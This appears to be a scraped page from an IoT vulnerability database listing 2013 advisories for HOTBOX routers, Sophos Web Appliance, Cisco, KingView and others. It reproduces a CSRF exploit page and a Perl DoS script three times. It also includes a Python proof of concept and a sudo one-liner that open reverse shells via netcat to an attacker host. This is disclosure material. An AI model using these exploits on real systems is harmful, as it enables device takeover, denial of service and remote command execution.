VARIoT IoT vulnerabilities database

Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. A cross-site scripting vulnerability exists in HOT HOTBOX routers using software version 2.1.11. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+ Vulnerabilities List - # Default WPS Pin # Authentication based on IP Address # DoS via crafted POST # Path/Directory Traversal # Script injection via DHCP request # No CSRF Token Demo - http://www.youtube.com/watch?v=CPlT09ZIj48 CSRF EXPLOIT: <html> <form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1> <input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr"> <input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1"> <input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1"> <input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode"> <input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1"> <input type=hidden name="NBandwidth1" value="20" id="NBandwidth1"> <input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1"> <input type=hidden name="WifiSecurity" value="0" id="WifiSecurity"> <input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity"> <input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1"> <input type=hidden name="scanActions1" value="0" id="scanActions1"> <input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1"> <input type=hidden name="wpsActions1" value="0" id="wpsActions1"> </form> </html> <script>document.getElementById(1).submit();</script> DENIAL OF SERVICE EXPLOIT: use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent; # Author: Oz Elisyan # Date: 3 September 2013 # Affected Version: <= 2.1.11 print "# HOTBOX DoS PoC #\n\n" unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); } print "Sending Evil POST request...\n"; my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req); print "Done.";

Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+ Vulnerabilities List - # Default WPS Pin # Authentication based on IP Address # DoS via crafted POST # Path/Directory Traversal # Script injection via DHCP request # No CSRF Token Demo - http://www.youtube.com/watch?v=CPlT09ZIj48 CSRF EXPLOIT: <html> <form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1> <input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr"> <input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1"> <input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1"> <input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode"> <input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1"> <input type=hidden name="NBandwidth1" value="20" id="NBandwidth1"> <input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1"> <input type=hidden name="WifiSecurity" value="0" id="WifiSecurity"> <input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity"> <input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1"> <input type=hidden name="scanActions1" value="0" id="scanActions1"> <input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1"> <input type=hidden name="wpsActions1" value="0" id="wpsActions1"> </form> </html> <script>document.getElementById(1).submit();</script> DENIAL OF SERVICE EXPLOIT: use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent; # Author: Oz Elisyan # Date: 3 September 2013 # Affected Version: <= 2.1.11 print "# HOTBOX DoS PoC #\n\n" unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); } print "Sending Evil POST request...\n"; my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req); print "Done.";

goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+ Vulnerabilities List - # Default WPS Pin # Authentication based on IP Address # DoS via crafted POST # Path/Directory Traversal # Script injection via DHCP request # No CSRF Token Demo - http://www.youtube.com/watch?v=CPlT09ZIj48 CSRF EXPLOIT: <html> <form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1> <input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr"> <input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1"> <input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1"> <input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode"> <input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1"> <input type=hidden name="NBandwidth1" value="20" id="NBandwidth1"> <input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1"> <input type=hidden name="WifiSecurity" value="0" id="WifiSecurity"> <input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity"> <input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1"> <input type=hidden name="scanActions1" value="0" id="scanActions1"> <input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1"> <input type=hidden name="wpsActions1" value="0" id="wpsActions1"> </form> </html> <script>document.getElementById(1).submit();</script> DENIAL OF SERVICE EXPLOIT: use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent; # Author: Oz Elisyan # Date: 3 September 2013 # Affected Version: <= 2.1.11 print "# HOTBOX DoS PoC #\n\n" unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); } print "Sending Evil POST request...\n"; my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req); print "Done.";

The DNP3 Slave service in SUBNET Solutions SubSTATION Server 2.7.0033 and 2.8.0106 allows remote attackers to cause a denial of service (unhandled exception and process crash) via unspecified vectors. SUBNET Solutions SubSTATION Server is a substation communication server. Attackers can exploit this issue to cause denial-of-service conditions

Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link DSL-2740B Gateway with firmware EU_1.00 allow remote attackers to hijack the authentication of administrators for requests that (1) enable or disable Wireless MAC Address Filters via a wlFltMode action to wlmacflt.cmd, (2) enable or disable firewall protections via a request to scdmz.cmd, or (3) enable or disable remote management via a save action to scsrvcntr.cmd. The D-Link DSL-2740B is a router device. There are multiple cross-site request forgery vulnerabilities in the D-Link DSL-2740B. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. D-Link DSL-2740B EU_1.00 is vulnerable; other versions may also be affected

Apple AirPort Base Station Firmware before 7.6.4 does not properly handle incorrect frame lengths, which allows remote attackers to cause a denial of service (device crash) by associating with the access point and then sending a short frame. Apple Time Capsule is a wireless attached storage device that combines wireless built-in gateway routing from Apple. Apple AirPort Extreme is a wireless solution for home, school and small businesses. Apple AirPort and Time Capsule have errors in processing frames. An attacker can exploit this issue to cause an unexpected base station system termination, triggering a denial-of-service condition for legitimate users. The product supports streaming music and wireless printing. This issue was addressed by adding size checking to the parsing of small frames. It is recommended that AirPort Utility 6.3.1 be installed before upgrading to Firmware version 7.6.4 on OS X systems, and AirPort Utility 1.3.1 for iOS devices. AirPort Utility may be obtained through Apple's Software Download site: http://www.apple.com/support/downloads/ Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJSKlQVAAoJEPefwLHPlZEwdt8P/jb/AXcjc7V1huYAj7Mm/SS/ pX3k45IqAivLJlsGaPZs0Hjt4MZVmuUkQ8DpS7ttdbBnbS3MzJIB0yIqFFx2GM+R 853vMV6GjBfc6jY1yXD/71jpv0b6f75YWKndOMPBjVRfamq2tlOoUXV4oKzkA22Q kypZIl8xr2AxTeiA+jOgzFo1UQXIEk/dvAr98wsL7nbpTHFLHSpXYvN8qpXpbExT YS3e5p/QAYzm+Pcf97MCFrNyhLs1WhdZ47Ddu6CZuwZv+JmxMtQKVIa7TvFKVfa8 KJvFumYxCHh2ZkQfz+GcTn5RlFYPeq63VwSTq//bEx/BYhB7SKbf4JXSJfpz4IFz 514rS6WGKULDDjltWAADG8WOhbnWMxDCKvYQwT1C8yTqVDKnYJhiXofyb/lkvSUR OViCT6LTS5RfjWCzrIPYk+wajSEadb8V65N8wD3gAimfbv2oIf16ZljAxCNzp6jG XdrXRyLhPwN920AdtA7pVDtgWWmbxi536EAeWyppYn9RDsraAp/FZn0SStMTYYdE oUNvJ5onHSES+SYI6ITfXfSXTI9rY7kcyY51hcs5v2H+LOxNOQglLroi77GM5nMB LbHUwxadaOFmYWIVGMD3MbDnJRNxActqWCnjA7nj66/5ceUxdy//gjz3zPfYeApb JnaDL/59/3H37zeaurXh =C6U1 -----END PGP SIGNATURE-----

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to end-user/index.php. Sophos Web Appliance is prone to a remote command-injection vulnerability. Attackers can exploit this issue to execute arbitrary commands with the privileges of the 'spiderman' operating system user. Versions prior to Web Appliance 3.7.9.1 and 3.8.1.1 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. *Advisory Information* Title: Sophos Web Protection Appliance Multiple Vulnerabilities Advisory ID: CORE-2013-0809 Advisory URL: http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities Date published: 2013-09-06 Date of last update: 2013-09-06 Vendors contacted: Sophos Release mode: Coordinated release 2. *Vulnerability Information* Class: OS command injection [CWE-78], OS command injection [CWE-78] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4983, CVE-2013-4984 3. *Vulnerability Description* Sophos Web Protection Appliance [1] provides advanced web malware protection, URL filtering and content control (including scanning of HTTPS traffic) in a Secure Web Gateway appliance. 4. *Vulnerable Packages* . Other versions may be affected too but they were no checked. 5. *Non-Vulnerable Packages* . 6. *Vendor Information, Solutions and Workarounds* Sophos published release notes and a knowledgebase article acknowledging the issue and the assistance given by Core Security in tracking it down [2][3]. 7. *Credits* This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *Pre-authentication OS command injection vulnerability* [CVE-2013-4983] The file '/opt/ui/apache/htdocs/end-user/index.php' can be accessed by unauthenticated users at 'https://<WPA_server>/end-user/index.php'. It also can be reached through plain HTTP at 'http://<WPA_server>/index.php', since Apache's 'httpd.conf' configuration file defines a VirtualHost at port 80 having DocumentRoot '/opt/ui/apache/htdocs/end-user/'. The 'run()' function in this PHP script obtains the requested controller from its 'c' GET parameter and calls the appropriate handler. Available handlers are defined in '/opt/ui/apache/htdocs/config/UsrSiteflow.php': /----- <?php require_once('AbstractSiteFlow.php'); class UsrSiteflow extends AbstractSiteFlow { public function __construct() { $this->flow = array( "index" => "UsrBlocked.php", "blocked" => "UsrBlocked.php", "invalid_certificate" => "UsrBlocked.php", "rss" => "UsrRss.php", ); } } ?> -----/ That means that, for example, when requesting 'https://<WPA_server>/end-user/index.php?c=blocked', the 'UsrBlocked.php' script will be used to render the page. Looking at the code in '/opt/ui/apache/htdocs/controllers/UsrBlocked.php': /----- <?php [...] if(isset($_GET['action'])) { if($_GET['action'] == 'continue') { // use sblistpack to allow access $url = base64_decode($_POST['url']); $scheme = parse_url($url,PHP_URL_SCHEME); if($scheme == "https" && $this->config->read('wsa_proxy.https_scan') != 'yes') { $host = parse_url($url,PHP_URL_HOST); $args['url'] = $scheme . '://' . $host; } else { $args['url'] = $url; } if($_POST['args_reason'] == 'filetypewarn') { $key = $_POST['url']; $packer = '/opt/ws/bin/ftsblistpack'; $value = $_POST['filetype']; } else { $key = $_POST['domain']; $packer = '/opt/ws/bin/sblistpack'; $catParts = explode("|",$_POST['raw_category_id']); $value = $catParts[0]; } if(strlen(trim($_POST['user'])) > 0) $user = base64_decode($_POST['user_encoded']); else $user = $_POST['client-ip']; if($user == '-') $user = $_POST['client-ip']; $key = escapeshellarg($key); $user = escapeshellarg($user); $value = escapeshellarg($value); shell_exec("$packer $key $user $value"); [...] ?> -----/ we can see that the Perl script '/opt/ws/bin/sblistpack' will be executed when the following conditions are met: 1. the 'action' GET parameter is set to 'continue', and 2. the 'args_reason' POST parameter is set to anything different that 'filetypewarn'; Variables whose content is controlled by the user '($key, $user, $value)' are properly escaped by using 'escapeshellarg()' before calling 'shell_exec()', making the UsrBlocked.php script not vulnerable to OS command injection at that point. However, the invoked '/opt/ws/bin/sblistpack' Perl script itself is vulnerable to OS command injection, because its 'get_referers()' function doesn't escape the first argument of the script before using it within a string that will be executed as a command by using backticks: /----- sub get_referers { my $domain = shift; if(! -f $referer_list) { return (); } # handle multiple google domains (e.g. google.co.uk) if($domain =~ /^google\./) { $domain = 'google.com'; } my $output = `/opt/ws/bin/kvlistquery $referer_list $domain`; chomp $output; if($output =~ /'(.*)'$/) { my $sites = $1; return split('\|', $sites); } return (); } -----/ so, by setting the 'domain' POST parameter to a value like: /----- http://example.com;/bin/nc -c /bin/bash 192.168.1.100 4444 -----/ an unauthenticated remote attacker can execute arbitrary OS commands on the Sophos appliance with the privileges of the 'spiderman' operating system user. 8.1.1. *Proof of Concept* The following Python script exploits the pre-authentication OS command injection vulnerability and executes '/bin/nc -c /bin/bash 192.168.1.100 4444' on a vulnerable Sophos Web Protection Appliance in order to gain a reverse shell on attacker's machine at 192.168.1.100: /----- import sys import httplib def main(): if len(sys.argv) < 2: print "Usage: sophos_wpa_command_injection.py <target_ip>" sys.exit(1) host = sys.argv[1] port = 443 headers = {'Host': host, 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded' } body = 'url=aHR0cDovL3d3dy5leGFtcGxlLmNvbQ%3d%3d' body += '&args_reason=something_different_than_filetypewarn&filetype=dummy&user=buffalo' body += '&user_encoded=YnVmZmFsbw%3d%3d&domain=http%3a%2f%2fexample.com%3b%2fbin%2fnc%20-c%20%2fbin%2fbash%20192.168.1.100%204444' body += '&raw_category_id=one%7ctwo%7cthree%7cfour' conn = httplib.HTTPSConnection(host, port) conn.request('POST', '/end-user/index.php?c=blocked&action=continue', body=body, headers=headers) #Don't wait for the server response since it will be blocked by the spawned shell conn.close() print 'Done.' if __name__ == '__main__': main() -----/ 8.2. *Privilege escalation through local OS command injection vulnerability* [CVE-2013-4984] The Apache web server within the Sophos appliance runs under the 'spiderman' user. The '/etc/sudoers' file defines a list of Bash and Perl scripts that the 'spiderman' user can run with the 'sudo' command: /----- spiderman ALL=NOPASSWD:/opt/sophox/bin/configure_interface, \ /opt/sophox/bin/sophox-register, \ /opt/sophox/bin/sophox-remote-assist, \ [...] /opt/cma/bin/clear_keys.pl, \ [...] -----/ The Perl script '/opt/cma/bin/clear_keys.pl' is vulnerable to OS command injection, because its 'close_connections()' function: /----- sub close_connections { my ($client_ip, $signum, $signame) = @_; my @connections = `/bin/netstat -nap|grep ^tcp.*:22.*$client_ip.*EST`; foreach (@connections) { if(/ESTABLISHED\s*(\d+)\/sshd/) { my $conn_pid = $+; log_info("connection PID: $conn_pid; my PID: $$; my process tree: " . join(', ', @my_process_tree)); next if (grep {$_ == $conn_pid} @my_process_tree); log_info("Attempting to stop process '$conn_pid' with $signame"); kill $signum, $conn_pid; } } } -----/ doesn't escape the second argument of the script before using it within a string that will be executed as a command by using backticks. The following command can be executed within a compromised Web Protection Appliance to escalate privileges from 'spiderman' user to root and gain a reverse root shell on attacker's machine at 192.168.1.100: /----- $ sudo /opt/cma/bin/clear_keys.pl fakeclientfqdn ";/bin/nc -c /bin/bash 192.168.1.100 5555;" /fakedir -----/ 9. *Report Timeline* . 2013-08-12: Core Security Technologies notifies the Sophos team of the vulnerability and sends a technical report. Publication date is set for Sep 4th, 2013. 2013-08-13: Vendor acknowledges Core Security Technologies's e-mail, confirms the issues and notifies that they are working on a resolution and a release plan. 2013-08-14: Vendor notifies that they are expecting to release a fixed version in the first week of September. Vendor also notifies that they are also in the middle of an extended rollout of a new version of the product and would like to make this fix available to customers on both the new and old versions of the product, which increases the amount of testing involved. Sophos team asks for delay the advisory publication one week (Sep 11th). 2013-08-20: Core re-schedules the advisory publication for Sep 11th, 2013. 2013-09-05: Vendor notifies that they completed the testing early and the fixed version of the Web Appliance is scheduled for tomorrow, Friday 6th. Vendor also notifies that they have published release notes and a knowledgebase article acknowledging the issues [2][3]. 2013-09-06: Advisory CORE-2013-0809 published. 10. *References* [1] http://www.sophos.com/medialibrary/PDFs/factsheets/sophoswebappliancesdsna.pdf. [2] http://www.sophos.com/en-us/support/knowledgebase/119773.aspx. [3] http://ca-repo1.sophos.com/docs/ws1000/ws1000/concepts/ReleaseNotes_3.8.1.1.html. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Cisco Adaptive Security Appliances (ASA) devices, when SMP is used, do not properly process X.509 certificates, which allows remote attackers to cause a denial of service (device crash) via a large volume of (1) SSL or (2) TLS traffic, aka Bug ID CSCuh19462. This issue is being tracked by Cisco bug ID CSCuh19462

Cross-site scripting (XSS) vulnerability in bookmarklet.jsp in Cisco SocialMiner allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCuh73868. Cisco SocialMiner of bookmarklet.jsp Contains a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCuh73868. Cisco SocialMiner is a set of social media call center solutions from Cisco. The solution supports social media monitoring and analysis capabilities. The vulnerability stems from the fact that the program does not adequately filter user input

Cisco Jabber on Windows does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and modify the client-server data stream via a crafted certificate, aka Bug ID CSCug30280. Cisco Jabber for Windows is prone to a security-bypass vulnerability. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which may aid in further attacks. This issue is tracked by Cisco Bug ID CSCug30280. The program provides online status display, instant messaging, voice and other functions

The SUPERGRIDLib.SuperGrid ActiveX control in SuperGrid.ocx before 65.30.30000.10002 in WellinTech KingView before 6.53 does not properly restrict ReplaceDBFile method calls, which allows remote attackers to create or overwrite arbitrary files, and subsequently execute arbitrary programs, via the two pathname arguments, as demonstrated by a directory traversal attack. Kingview is the first SCADA product launched by Asia Control for small and medium-sized projects for monitoring and controlling automation equipment and processes. WellinTech KingView ActiveX has multiple arbitrary file coverage vulnerabilities. Because the program fails to properly filter user input, an attacker can exploit the vulnerability to save arbitrary files on the affected application context computer. WellinTech KingView is prone to multiple insecure-method vulnerabilities because it fails to properly sanitize user-supplied input. KingView 6.53 is vulnerable; other versions may also be affected

The KCHARTXYLib.KChartXY ActiveX control in KChartXY.ocx before 65.30.30000.10002 in WellinTech KingView before 6.53 does not properly restrict SaveToFile method calls, which allows remote attackers to create or overwrite arbitrary files, and subsequently execute arbitrary programs, via the single pathname argument, as demonstrated by a directory traversal attack. Kingview is the first SCADA product launched by Asia Control for small and medium-sized projects for monitoring and controlling automation equipment and processes. WellinTech KingView ActiveX has multiple arbitrary file coverage vulnerabilities. Because the program fails to properly filter user input, an attacker can exploit the vulnerability to save arbitrary files on the affected application context computer. WellinTech KingView is prone to multiple insecure-method vulnerabilities because it fails to properly sanitize user-supplied input. KingView 6.53 is vulnerable; other versions may also be affected

Buffer overflow in Cisco WebEx Advanced Recording Format (ARF) player T27 LD before SP32 EP16, T27 L10N before SP32_ORION111, and T28 before T28.8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted ARF file, aka Bug IDs CSCue74118, CSCub28371, CSCud23401, and CSCud31109. An attacker could exploit this issue to crash the affected player causing denial-of-service conditions or execute arbitrary code in context of the user. This issue is being tracked by Cisco Bug IDs CSCue74118, CSCub28371, CSCud23401 and CSCud31109. The following versions are affected: 27.11.26, 27.21.10, 27.25.10, 27.32.1, 27.32.10, 28.4, 28.0.0

Buffer overflow in Cisco WebEx Advanced Recording Format (ARF) player T27 LD before SP32 EP16, T27 L10N before SP32_ORION111, and T28 before T28.8 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted ARF file, aka Bug IDs CSCue74147 and CSCub28383. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. This issue is being tracked by Cisco Bug IDs CSCue74147 and CSCub28383. The following versions are affected: 27.11.26, 27.21.10, 27.25.10, 27.32.1, 27.32.10, 28.4, 28.0.0

Buffer overflow in the exception handler in Cisco WebEx Recording Format (WRF) player T27 LD before SP32 EP16, T27 L10N before SP32_ORION111, and T28 before T28.8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted WRF file, aka Bug ID CSCuc27639. Cisco WebEx WRF Player is prone to a remote memory-corruption vulnerability. An attacker could exploit this issue to crash the affected player causing denial-of-service conditions or execute arbitrary code in context of the user. This issue is being tracked by Cisco Bug ID CSCuc27639. The following versions are affected: 27.11.26, 27.21.10, 27.25.10, 27.32.1, 27.32.10, 28.4, 28.0.0

Stack-based buffer overflow in Cisco WebEx Recording Format (WRF) player T27 LD before SP32 EP16, T27 L10N before SP32_ORION111, and T28 before T28.8 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCuc27645. Vendors have confirmed this vulnerability Bug ID CSCuc27645 It is released as.Skillfully crafted by a third party WRF An arbitrary code may be executed via the file. An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCuc27645. The vulnerability stems from the software not properly handling .wrf files. The following versions are affected: 27.11.26, 27.21.10, 27.25.10, 27.32.1, 27.32.10, 28.4, 28.0.0

Buffer overflow in Cisco WebEx Recording Format (WRF) player T27 LD before SP32 EP16, T27 L10N before SP32_ORION111, and T28 before T28.8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted DHT index value in JPEG data within a WRF file, aka Bug ID CSCuc24503. Cisco WebEx Recording Format (WRF) player Contains a buffer overflow vulnerability. An attacker could exploit this issue to crash the affected player causing denial-of-service conditions or execute arbitrary code in context of the user. This issue is being tracked by Cisco Bug ID CSCuc24503. The following versions are affected: 27.11.26, 27.21.10, 27.25.10, 27.32.1, 27.32.10, 28.4, 28.0.0

Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Global Site Selector (GSS) allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCuh42164. Vendors have confirmed this vulnerability Bug ID CSCuh42164 It is released as.A third party may be able to hijack the authentication of any user. Attackers can exploit this issue to perform certain administrative actions and to gain unauthorized access to the affected application. This issue is being tracked by Cisco bug ID CSCuh42164. The product optimizes site selection, improves DNS response and ensures data center availability. An attacker could exploit this vulnerability to convince users of an affected system to follow a malicious link or visit an attacker-controlled website. This vulnerability could be exploited with user privileges to submit arbitrary requests to an affected device

